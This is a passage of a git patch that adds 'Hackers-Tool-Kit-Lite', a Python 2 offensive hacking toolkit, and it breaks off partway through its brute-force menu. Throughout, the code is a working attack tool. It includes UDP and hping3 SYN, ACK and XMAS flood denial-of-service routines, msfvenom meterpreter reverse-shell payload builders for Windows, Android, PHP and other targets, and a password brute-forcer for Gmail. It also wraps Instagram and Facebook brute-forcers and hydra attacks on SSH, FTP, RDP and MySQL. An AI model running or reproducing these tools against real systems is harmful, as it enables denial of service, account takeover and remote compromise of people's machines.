sys.argv[1] == "--run": - if len(sys.argv) < 3: - print "Not Enough Arguments" - sys.exit() - os.system("python commandlist/{0}.py".format(sys.argv[2])) - main() - if sys.argv[1] == "--commandcount": - a = os.popen("ls commandlist -1 | wc -l").read() - b = a.replace('\n', '') - if b == "1": - print "(\033[32m{0}\033[0m) Command is available".format(b) - else: - print "(\033[32m{0}\033[0m) Commands are available".format(b) - if sys.argv[1] == "--proxy": - os.system("service tor restart") - os.system("proxychains python htkl.py") - - if sys.argv[1] == "--quickrun": - mainbanner() - main() - - if sys.argv[1] == "--commandinfo": - if len(sys.argv) < 3: - print "Not Enough Arguments" - sys.exit() - try: - command = os.popen('cat commandinfo/{0}.txt'.format(sys.argv[2])).read() - print command - except: - print "No command named {0} available".format(command) - - if sys.argv[1] == "--commandsearch": - if len(sys.argv) < 3: - print "Not Enough Arguments" - sys.exit() - command = os.popen('find commandlist -name "*{0}*"'.format(sys.argv[2])).read() - a = command.replace('commandlist/', '') - b = a.replace('.py', '') - c = b.replace('commandlist', '') - - print "Commands Found Matching '{0}':\n".format(sys.argv[2]) - print c -except: - os.system("") From df8366a201821a23737f95976f456364a46e0a27 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 3 Dec 2019 20:20:27 +0000 Subject: [PATCH 209/214] Add files via upload --- htk-lite/htkl.py | 1899 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 1899 insertions(+) create mode 100644 htk-lite/htkl.py diff --git a/htk-lite/htkl.py b/htk-lite/htkl.py new file mode 100644 index 0000000..c5a2f34 --- /dev/null +++ b/htk-lite/htkl.py @@ -0,0 +1,1899 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import smtplib +import random +import requests +import os +import sys +import socks +import socket +import readline +import time +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) + +os.system("printf '\e[8;27;100t'") +os.system("printf '\033]2;Hackers-Tool-Kit-Lite | HTK-Lite | @tuf_unkn0wn\a'") + +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +BD = '\033[1m' + +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] +inputlist = ['☢', '☣', '☠', '♠', '❖', '⚛', '☘', '♞', '⚄', '⚒', '⚓', '⚔', '⬖', '⬗', '⬘', '⬙'] + + +def starting(): + os.system("service tor start") + os.system("service postgresql start") + + os.system("clear") + + for x in range(5): + + print(random.choice(colorlist) + "##########") + + time.sleep(0.1) + + os.system("clear") + + print(random.choice(colorlist) + "++########") + + time.sleep(0.1) + + os.system("clear") + + print(random.choice(colorlist) + "++++######") + + time.sleep(0.1) + + os.system("clear") + + print(random.choice(colorlist) + "++++++####") + + time.sleep(0.1) + + os.system("clear") + + print(random.choice(colorlist) + "++++++++##") + + time.sleep(0.1) + + os.system("clear") + + + + + +def mainbanner1(): + print """\033[1;36m + ┬ ┬┌┬┐┌─┐\033[0m + │ │ │ ├┤ \033[1;36m + ┴─┘┴ ┴ └─┘ \033[0m +██╗ ██╗████████╗██╗ ██╗ +██║ ██║╚══██╔══╝██║ ██╔╝\033[1;36m +███████║ ██║ █████╔╝ \033[0m +██╔══██║ ██║ ██╔═██╗ +██║ ██║ ██║ ██║ ██╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ + \n""".decode('utf-8') + +def mainbanner2(): + print """ + ░░▒█████████ + ▒▓▓█████████████ + ░▓█████████████████████░ ░▒███▓ + ░▓██████████████████████████████████ + ░░▒▓▓▓███████████┬ ┬┌┬┐┌─┐████████████▓ + ░▓██████▓▓██████████│ │ │ ├┤ █████████████▓░ + ░▓██████▓███████▓██████┴─┘┴ ┴ └─┘████████████████░ + ░░▒░░░░▒▒▒▓▓░░▒███████████████████████████▓▓▓░ + ░░░▒░░░▒▓▓▒░▒▒░▒▓████████▓▓██▒▒░ + ░▒░░░░░░▒░░░░░░░ + \n""".decode('utf-8') + +def mainbanner3(): + print """ +╔═══════════════════════════════════════════════╗ +║ ║ +║ {0} ██░ ██ ▄▄▄█████▓ ██ ▄█▀ ██▓ \033[0m ║ +║ {1} ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ ▓██▒ \033[0m ║ +║ {2} ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ ▒██░ \033[0m ║ +║ {3} ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ ▒██░ \033[0m║ +║ {4} ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄░██████▒ \033[0m║ +║ {5} ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒░ ▒░▓ ░ \033[0m║ +║ {6} ▒ ░▒░ ░ ░ ░ ░▒ ▒░░ ░ ▒ ░ \033[0m║ +║ {7} ░ ░░ ░ ░ ░ ░░ ░ ░ ░ \033[0m║ +║ {8} ░ ░ ░ ░ ░ ░ ░ \033[0m║ +║ ║ +║ ║ +╚═══════════════════════════════════════════════╝ + """.decode('utf-8').format(random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list)) + +def mainbanner4(): + print """\033[0m +████████████████████████████████████████████████████████████████████████████\033[91m +███ ███████ ██ █ ███ ███████ ████████ ██ ████████████\033[33m +████ ███████ ██████ █████ ██ █████████ █ █ █████████ ██ ██ ██████ ███\033[93m +████ █████ ███████ ██████ █████████████ ████████ ███ █████ ████\033[92m +████ ██████ █████ █████████████ ██████ █ █ ██ ██ █ █████ ███\033[94m +████ █████ ███████ ██████ █████████████ █████████ ████ ███ ███\033[1;36m +████ ███████ ███████ ██████ ██ ███████████ █████ ███ ████ ██ █ █████████\033[95m +███ █████ █████ ████ ███ ████████ ██ ███ ████ ███\033[0m +████████████████████████████████████████████████████████████████████████████ + \033[0m\n""".decode('utf-8') + +def mainbanner5(): + print """\033[92m + + █ ▄ ▄ █ ▄███▄ ▄██ ▄███▀ + ███ ███ ▄█████████▄ ███▐██▀ + ███ ███ ██▀▀███▀▀██ █████▀ + ███▄▄▄▄███ ▀ ███ ▀ ██████▄ + ███▀▀▀▀███ ▄ ███ ▄ ███▐██▄ + ███ ███ \033[0m┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ \033[92m███ \033[0m┌─┐┌─┐┬ \033[92m███ ▀███▄ \033[0m┬┌┬┐\033[92m + ███ ███ \033[0m├─┤│ ├┴┐├┤ ├┬┘└─┐ \033[92m███ \033[0m│ ││ ││ \033[92m███ ██ \033[0m│ │ \033[92m + █ █ \033[0m┴ ┴└─┘┴ ┴└─┘┴└─└─┘ \033[92m▀███▀ \033[0m└─┘└─┘┴─┘ \033[92m▀ ▀ \033[0m┴ ┴\033[92m + + + + ███ + █ █ + █ █ ██ ████████ ███████ + █ █ ██ ██ ██ + █ █ ██ ██ █████ + █ █ ▄ ██ ██ ██ + █████▄▄██ ██ ██ ███████ + + + """.decode('utf-8') + +def mainbanner6(): + print """ + • \033[35m▄█\033[0m . \033[35m█▄ \033[0m. \033[35m███ \033[0m. • \033[35m▄█ ▄█▄\033[0m. \033[35m▄█ \033[0m• + \033[35m█#█ █#█\033[0m• \033[35m▀████=████▄\033[0m. \033[35m███ ▄█ █▀ █⇣█ \033[0m. +. \033[35m█#█ \033[0m. •\033[35m█#█ \033[0m. \033[35m▀█-█▀▀██ \033[0m.\033[35m█ █▐ █▀ \033[0m• \033[35m█L█ \033[0m. + \033[35m▄███▄▄▄▄███▄▄ \033[0m. \033[35m█▪█ \033[0m. \033[35m▀ ▄█████▀ \033[0m.\033[35m█i█ +▀▀█+█▀▀▀▀█+█▀ \033[0m• \033[35m█▪█ \033[0m. \033[35m▀▀█ █ █▄\033[0m. \033[35m█t█ \033[0m. + .\033[35m█•█ \033[0m. \033[35m█•█ \033[0m. \033[35m█▪█ \033[0m• \033[35m███▐ █▄ \033[0m. \033[35m█e█ \033[0m. + \033[35m█+█ █+█ \033[0m. \033[35m█▪█ \033[0m. \033[35m█ █\033[0m.\033[35m▀█ █▄ █⇡█▌ \033[0m• \033[35m▄ +\033[0m• \033[35m███ \033[0m.\033[35m█▀ \033[0m. \033[35m ▄████▀ \033[0m. \033[35m███ \033[0m. \033[35m▀█▀ █████▄▄██ + \033[0m . . . . \033[35m▀ \033[0m•\033[35m▀\033[0m] + """.decode('utf-8') +def mainbanner7(): + print """\033[31m +██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ +██║ ██║╚\033[91m══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ +███████║ ██║ █████╔╝████\033[33m█╗██║ ██║ ██║ █████╗ +██╔══██║ ██║ ██╔═██╗╚════╝\033[93m██║ ██║ ██║ ██╔══╝ +██║ ██║ ██║ ██║ ██╗ ███████╗██║ ██║ ███████╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝\033[0m + """.decode('utf-8') + +def mainbanner8(): + print """\033[34m +██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ +██║ ██║╚══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ +███████║ ██║ █████╔╝█████╗█\033[94m█║ ██║ ██║ █████╗ +██╔══██║ ██║ ██╔═██╗╚════╝██║ ██║ ██║ ██╔══╝ +██║ ██║ █\033[1;36m█║ ██║ ██╗ ███████╗██║ ██║ ███████╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝ + \033[0m""".decode('utf-8') + +def mainbanner9(): + print """\033[93m +██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ +██║ ██║╚══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ +███\033[92m████║ ██║ █████╔╝█████╗██║ ██║ ██║ █████╗ +██╔══██║ ██║ ██╔═██╗╚════╝\033[32m██║ ██║ ██║ ██╔══╝ +██║ ██║ ██║ ██║ ██╗ ███████╗██║ ██║ ███████╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝ + \033[0m""".decode('utf-8') + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,9) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + +def helpbanner(): + a = os.popen("ls commandlist -1 | wc -l").read() + b = a.replace('\n', '') + print """ +╔══════════════════════════════════════════════════════════╗ +║ ║ +║ \033[92m ██░ ██ ▓█████ ██▓ ██▓███ \033[0m ║ +║ \033[90m ▓██░ ██▒▓█ ▀ ▓██▒ ▓██░ ██▒ \033[0m ║ +║ \033[92m ▒██▀▀██░▒███ ▒██░ ▓██░ ██▓▒ \033[0m ║ +║ \033[90m ░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██▄█▓▒ ▒ \033[0m ║ +║ \033[92m ░▓█▒░██▓░▒████▒░██████▒▒██▒ ░ ░ \033[0m ║ +║ \033[94m ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░▒▓▒░ ░ ░ \033[0m ║ +║ \033[90m ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░▒ ░ \033[0m ║ +║ \033[94m ░ ░░ ░ ░ ░ ░ ░░ \033[0m ║ +║ \033[90m ░ ░ ░ ░ ░ ░ ░ \033[0m ║ +║ ║ +║══════════════════════════════════════════════════════════║ +║ Commands: [\033[32m{0}\033[0m] Banners: [\033[31m9\033[0m] ║ +║══════════════════════════════════════════════════════════════════════════════════════╗ +║ ? | this menu ║ +║ exit | exit htkl ║ +║ reboot | reboot htkl ║ +║ clear | clears screen ║ +║ banner | shows a banner ║ +║ command | run a terminal command ║ +║ terminal | open another terminal ║ +║ sysinfo | gather information about your device ║ +║ infoscan | gather information on a host [for a more specific scan type infoscan -o] ║ +║ dos | run Denial-Of-Service attacks ║ +║ payload | Make a msf payload ║ +║ password | crack social media, service and wifi passwords ║ +║ monitor | turn monitor mode on and off [monitor on | monitor off] ║ +║ anon | make yourself anonymous [anon on | anon off] ║ +║ netscan | gather information about your network ║ +║ verscan | scan for a service version on a host ║ +║ wordlist | make wordlists ║ +║ arpspoof | ARP Spoofing ║ +║ traff | show internet traffic ║ +║ hashid | find out what type of hash a hash is ║ +║ aserver | start a apache server ║ +║ dnsspoof | DNS Spoofing [to dns spoof subnet type dnsspoof --all] ║ +║ ║ +║ ║ +║ ║ +║ \033[5m@tuf_unkn0wn\033[0m ║ +╚══════════════════════════════════════════════════════════════════════════════════════╝ + \033[0m\n""".format(b) + +def infoscan(): + try: + target = raw_input("\033[1mTarget:\033[0m ") + port = raw_input("\033[1mPort:\033[0m ") + print "\033[93m! HTTP OR HTTPS !\033[0m\n" + ht = raw_input("[https/http]: ") + if ht == "http": + targetht = 'http://' + if ht == "https": + targetht = 'https://' + print "\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[0m\n" + os.system("curl {0}".format(target)) + print "\n" + ip = socket.gethostbyname(target) + print G+"------------------------\033[0m" + print N+"\033[1mHost:\033[32m ", target + print N+"\033[1mIP:\033[32m ", ip + print G+"------------------------\033[0m" + os.system("curl -I {0}".format(target)) + print "\n" + request = requests.get(targetht + target) + http = request.status_code + if http == 200: + print("\nServer: [\033[32monline\033[0m]") + else: + print("\nServer: [\033[31moffline\033[0m]") + exit() + print "\n" + whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") + print(whois) + print "\n" + os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) + print "\n" + os.system("wafw00f {0}".format(target)) + print "\n" + os.system("sslscan {0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) + print "\n" + def daf(): + subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", + "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", + "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", + "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", + "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", + "web", "dev"] + + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(target) + showip = socket.gethostbyname(str(hosts)) + print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) + except: + print "\033[0mBypassing..." + + daf() + print "\033[0m" + print "\n" + os.system("nmap -A {0}".format(target)) + print "\n" + os.system("nmap --script dns-brute {0}".format(target)) + print "\n" + a = 'dirb {0}{1}/'.format(targetht,target) + os.system(a) + print "\n" + os.system("nikto -h {0} -p {1}".format(target,port)) + print "\n\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[0m" + except: + print "\033[91mError Something Went Wrong Maybe The Specified Target Is Not Available\033[0m" + +def specscan(): + print """\033[1m +Scans Available:\033[0m + +1: simple nmap portscan + +2: show document info of target with curl + +3: nmap OS detection, version detection, script scanning, and traceroute scan + +4: nmap dns bruteforce + +5: get a hosts ip address + +6: check if a host is online + +7: who-is lookup + +8: dns-lookup + +9: get a hosts source code + +10: web application firewall scanner + +11: run a ssl scan + +12: find the location of a ip address + +13: reverse ip lookup + +14: host search + +15: reverse dns + +16: find shared dns + +17: cloudflare bypass + +18: sslscan + +19: directory scan / bruteforce + +20: nikto scan [this might take awhile to finish] + +go back: go back to main menu + + """ + print "Type a number then your target Ex: 5 www.pornhub.com\n" + j = False + while not j: + try: + option, target = raw_input("\033[1mScan:\033[0m ").split() + if option == "1": + os.system("nmap {0}".format(target)) + if option == "2": + os.system("curl -I {0}".format(target)) + if option == "3": + os.system("nmap -A {0}".format(target)) + if option == "4": + os.system("nmap --script dns-brute {0}".format(target)) + if option == "5": + ip = socket.gethostbyname(target) + print """ + Host: {0} + IP: {1} + """.format(target, ip) + if option == "6": + ht = raw_input("\033[1mHTTP or HTTPS:\033[0m ") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + request = requests.get(targetht + target) + http = request.status_code + if http == 200: + print("\nServer: [\033[32monline\033[0m]") + else: + print("\nServer: [\033[31moffline\033[0m]") + if option == "7": + whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") + print(whois) + if option == "8": + os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) + if option == "9": + os.system("curl {0}".format(target)) + if option == "10": + os.system("wafw00f {0}".format(target)) + if option == "11": + os.system("sslscan {0}".format(target)) + if option == "12": + os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) + if option == "13": + os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) + if option == "14": + os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) + if option == "15": + os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) + if option == "16": + os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) + if option == "17": + def daf(): + subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", + "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", + "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", + "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", + "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", + "web", "dev"] + + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(target) + showip = socket.gethostbyname(str(hosts)) + print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) + except: + print "\033[0mBypassing..." + + daf() + if option == "18": + a = 'sslscan {0}'.format(target) + os.system(a) + if option == "19": + ht = raw_input("HTTP or HTTPS: ") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + a = 'dirb {0}{1}/'.format(targetht,target) + os.system(a) + if option == "20": + port = raw_input("\033[1mPort:\033[0m ") + os.system("nikto -h {0} -p {1}".format(target,port)) + if target == "back": + break + except: + print "\n" + break + j = True + + +def dos(): + print """ +{0}tcp: * tcp target port +{1}udp: * udp target port +{2}syn: * syn target port +{3}ack: * ack target port +{4}xmas: * xmas target port +\033[0m +!Press CTRL C to stop attacking! + """.format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + try: + command, target, port = raw_input("\033[1mMethod:\033[0m ").split() + if command == "tcp": + os.system("service tor restart") + os.system("hping3 --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + if command == "udp": + try: + ip = socket.gethostbyname(target) + port = int(port) + os.system("service tor restart") + sent = 0 + while True: + print N+"UDP attack sending | {6}{5}\033[0m | {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year,ip,random.choice(colorlist)) + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + if port == 65534: + port = 1 + except: + print "\nUDP flood stopped\n" + os.system("") + if command == "syn": + os.system("service tor restart") + os.system("hping3 -S --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + if command == "ack": + os.system("service tor restart") + os.system("hping3 -A --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + if command == "xmas": + os.system("hping3 -X --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + except: + print "\n\033[91mError: Not Enough Arguments\033[0m\n " + + +def payload(): + print """\033[0m033[1m +Payloads Available:\033[0m + +{0}1: windows/meterpreter/reverse_tcp + +{1}2: android/meterpreter/reverse_tcp + +{2}3: php/meterpreter/reverse_tcp + +{3}4: python/meterpreter/reverse_tcp + +{4}5: ruby/shell_reverse_tcp + +{5}6: osx/x86/vforkshell/reverse_tcp + +{6}7: linux/aarch64/meterpreter/reverse_tcp + + \033[0m""".format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + choice = raw_input("\033[1mPayload:\033[0m ") + lhost = raw_input("\033[1mLHOST: \033[0m") + lport = raw_input("\033[1mLPORT: \033[0m") + name = raw_input("\033[1mFilename: \033[0m") + if choice == "1": + payload = 'msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.exe'.format(lhost, lport, name) + os.system(payload) + if choice == "2": + payload = 'msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.apk'.format(lhost, lport, name) + os.system(payload) + if choice == "3": + payload = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost, lport, name) + os.system(payload) + if choice == "4": + payload = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost, lport, name) + os.system(payload) + if choice == "5": + payload = 'msfvenom -p ruby/shell_reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.rb'.format(lhost, lport, name) + os.system(payload) + if choice == "6": + payload = 'msfvenom -p osx/x86/vforkshell/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.app'.format(lhost, lport, name) + os.system(payload) + if choice == "7": + payload = 'msfvenom -p linux/aarch64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.tar'.format(lhost, lport, name) + os.system(payload) + +def gmail(): + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() + +def insta(): + insta = raw_input("\033[1mUsername:\033[0m ") + jl = raw_input("\033[1mWordlist:\033[0m ") + print "\033[1m\033[94m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" + k = raw_input("\033[1mMode:\033[0m ") + ma = 'python3 files/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) + os.system(ma) + +def fb(): + facebook = raw_input("\033[1m[EMAIL/ID->]:\033[0m ") + word = raw_input("\033[1m[WORDLIST->]:\033[0m ") + ks = 'cd files && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def blackhydra(): + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " 